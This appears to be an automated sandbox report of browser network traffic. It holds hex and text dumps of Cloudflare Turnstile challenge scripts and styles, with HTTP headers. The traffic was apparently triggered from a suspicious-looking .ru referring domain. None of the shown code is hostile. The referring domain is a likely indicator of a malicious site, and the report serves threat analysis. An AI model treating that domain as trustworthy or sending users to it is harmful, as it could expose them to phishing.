                                              2024-12-18 22:41:50 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                              Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                              2024-12-18 22:41:50 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                              Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                              2024-12-18 22:41:50 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                              Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                              2024-12-18 22:41:50 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                              Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                              2024-12-18 22:41:50 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                              Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449764104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:49 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/ HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: iframe
                                              Referer: https://to.eemjhiulz.ru/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:50 UTC1362INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 26678
                                              Connection: close
                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                              cross-origin-embedder-policy: require-corp
                                              cross-origin-opener-policy: same-origin
                                              cross-origin-resource-policy: cross-origin
                                              origin-agent-cluster: ?1
                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                              referrer-policy: same-origin
                                              document-policy: js-profiling
                                              2024-12-18 22:41:50 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 32 61 39 61 30 30 61 32 64 37 32 38 36 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                              Data Ascii: Server: cloudflareCF-RAY: 8f42a9a00a2d7286-EWRalt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:50 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                              2024-12-18 22:41:50 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                              Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                              2024-12-18 22:41:50 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                              Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                              2024-12-18 22:41:50 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                              Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                              2024-12-18 22:41:50 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                              Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                              2024-12-18 22:41:50 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                              Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                              2024-12-18 22:41:50 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                              Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                              2024-12-18 22:41:50 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                              Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                              2024-12-18 22:41:50 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                              Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449765104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:51 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f42a9a00a2d7286&lang=auto HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:51 UTC331INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:51 GMT
                                              Content-Type: application/javascript; charset=UTF-8
                                              Content-Length: 115968
                                              Connection: close
                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Server: cloudflare
                                              CF-RAY: 8f42a9aaba214390-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:51 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                              2024-12-18 22:41:51 UTC1369INData Raw: 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25
                                              Data Ascii: rnstile_feedback_report":"Having%20trouble%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%
